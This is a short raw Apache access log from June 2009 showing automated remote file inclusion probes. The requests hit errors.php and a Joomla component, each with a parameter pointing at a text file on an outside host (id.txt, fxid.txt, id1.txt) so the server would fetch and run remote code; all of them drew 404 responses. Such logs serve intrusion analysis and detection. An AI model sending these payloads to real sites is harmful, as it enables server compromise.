211.43.202.66 - - [19/Jun/2009:01:17:43 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:01:18:08 -0400] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:01:18:08 -0400] "GET /logs/access_log.Q109051300/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:01:18:08 -0400] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:01:18:17 -0400] "GET /logs/access_log.Q109051300%20%20/errors.php?error=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:01:18:17 -0400] "GET /logs/access_log.Q109051300%20%20/errors.php?error=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.189.2.38 - - [19/Jun/2009:01:18:19 -0400] "GET /logs/access_log.Q109052500%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
